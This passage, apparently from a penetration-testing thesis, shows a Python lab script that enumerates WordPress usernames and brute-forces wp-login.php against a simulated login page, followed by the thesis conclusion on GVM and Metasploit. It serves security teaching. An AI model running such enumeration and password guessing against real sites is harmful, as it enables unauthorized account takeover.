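    return None


def session_reaches_target(cred: Credential, target_host: str) -> bool:
    """False when the site URL points elsewhere (e.g. 127.0.0.1): a browser follows the
    redirect to its own loopback, so the login 'fails' although the password was right."""
    return cred.redirect_host is None or cred.redirect_host == target_host


def make_fake_wordpress(valid_user: str, valid_password: str, site_url: str):
    """Constructed stand-in for wp-login.php (no network). site_url plays the 'siteurl' option."""
    def send(user: str, password: str) -> Response:
        if (user, password) == (valid_user, valid_password):
            return 302, {"Set-Cookie": "wordpress_logged_in_0a1b2c=demo%7C1717000000%7Cabc; path=/",
                         "Location": f"{site_url}/wp-admin/"}, ""
        return 200, {"Content-Type": "text/html"}, (
            '<div id="login_error">Error: The password you entered for the username '
            f'{user} is incorrect.</div>')
    return send


if __name__ == "__main__":
    # enumeration: both techniques, de-duplicated in order of discovery (constructed responses)
    users = [username_from_author_redirect("http://192.168.112.141/author/demo/")]
    users += usernames_from_rest_users('[{"id": 1, "slug": "demo", "name": "demo"}]')
    users = list(dict.fromkeys(u for u in users if u))
    wordlist = ["password", "admin", "123"]  # tiny constructed stand-in for common.txt
    # the lab target: siteurl is localhost, as in this test case
    send = make_fake_wordpress("demo", "123", "http://127.0.0.1")
    cred = brute_force(send, users, wordlist)
    print(cred, "browser session reaches target:",
          cred is not None and session_reaches_target(cred, "192.168.112.141"))
```

Against a real target, `send` would POST log/pwd to wp-login.php without following redirects (otherwise the Set-Cookie and Location evidence is lost), and the off-target redirect host is exactly the symptom of a site URL left at 127.0.0.1.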
6 Conclusion
The objectives of this thesis were to coordinate security testing tools and to contribute to more effective pentest methodologies for organizations, covering exploitation payloads, risk-level assessment and the development of robust security tactics.
Tool Enhancement
Continued development and refinement of GVM and MF are essential to address emerging threats. Future research should incorporate automation, artificial intelligence and machine learning to improve vulnerability detection, prevention and exploitation techniques. Both tools, and the vulnerability feeds and exploit modules they depend on, should be kept up to date so that current vulnerability information and payloads are available. Finally, a commercial license should be considered to ensure compliance and to receive support and updates from the vendors.
Expanding the Scope
Future pentest initiatives should include newer technologies such as Internet of Things (IoT) devices and private, public and hybrid cloud environments to ensure comprehensive security coverage. The approach should also be applied beyond laboratory settings and adapted to different industries and applications, rather than being limited to controlled lab environments.
Training and Continuous Improvement
Establishing advanced training programmes for cybersecurity professionals in the combined use of tools like GVM and MF will enhance the overall effectiveness of pentest efforts. Furthermore, a continuous improvement process for pentest methodologies will help organizations stay secure.